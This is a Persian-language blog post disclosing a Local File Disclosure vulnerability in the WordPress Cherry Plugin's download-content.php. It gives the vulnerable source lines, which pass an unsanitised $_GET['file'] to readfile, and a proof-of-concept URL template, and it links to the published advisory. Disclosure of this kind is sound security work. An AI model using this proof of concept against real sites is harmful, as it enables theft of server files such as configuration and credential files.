آسیب پذیری Cherry Plugin – Local File Disclosure

توسط shahin shapoori در ۱۳۹۵-۱۰-۱۳

Cherry Plugin – Local File Disclosure

کشف حفره امنیتی از پلاگین معتبر Cherry که جزو یکی از پلاگین های پر استفاده برای ویجت های Cherry Framework هست.

این آسیب پذیری توسط تیم امنیتی ایران کشف شد.

نوع حفره امنیتی Local File Download که به هکر اجازه می دهد بصورت لوکالی/ریموت از روی سایت اقدام به دانلود فایل درون هاست کند.

این حفره امنیتی مدت ها کشف شده بود و در اولین روز سال جدیدی میلادی به ثبت رسید تا هدیه ما به کاربران عزیز باشه.

لینک اکسپلویت :

https://cxsecurity.com/issue/WLB-2017010004

Local File Disclosure,Local File Download

[-] Title : cherry plugin - Local File Disclosure
[-] Author : Iran Security Team
[-] Vendor : https://github.com/CherryFramework/cherry-plugin
[-] Category : Webapps
[-] Date : ۲۸٫November.2016

Vulnerable page :
cherry-plugin/admin/import-export/download-content.php

Vulnerable Source :
۳۳: readfile readfile($file);
۱۵: $file = $_GET[‘file’] : ”;

POC :
http://localhost/pach/admin/import-export/download-content.php?file=[LFD]

با تشکر ویژه از Shahab R@DIK@L

یک نظر بدهید

10 + پنج =